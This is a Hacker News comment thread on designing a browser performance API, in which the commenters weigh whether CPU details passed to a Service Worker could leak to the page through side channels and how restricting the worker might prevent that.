← Back to context

Comment by derefr

6 months ago

If a page can already deduce performance fluctuations all on its own, then you don't need a special access-limited performance API, do you? Just have the page do whatever you're imagining could be done to extract this side-channel info on the performance of the host — and then leak the results of that measurement over the network directly.

(I imagine, if such measurements done by pages are at-all distinguishable from noise, that they are already being exfiltrated by any number of JS user-fingerprinting scripts.)

A page can deduce performance fluctuations. It just needs to do the same calculation multiple times and measure the times.

The issue with the API is that it provides specifics about the CPU like "Apple M2 Max". If you give this info to a worker, the worker can encode it into a side-channel and send it to the page.

  • I imagine you could "solve" this (for a painful and pointless value of "solve") by 1. only allowing the Service Worker to do constant-time versions of operations (like the constant-time primitives that cryptographic code uses), and 2. not allowing this special Service Worker the ability to ever... execute a loop.

    But at that point, you've gone so far to neutering the page-controlled Service Worker, that having a page-controlled Service Worker would be a bit pointless. If the Service Worker can only do exactly one WebGL API call for each metric timeseries datapoint it receives, then the particular call it's going to be making is something you could predict perfectly in advance given the datapoint. So at that point, why have the page specify it? Just let the browser figure out how to render the chart.

    So I revised the design to do exactly that: https://news.ycombinator.com/item?id=40929284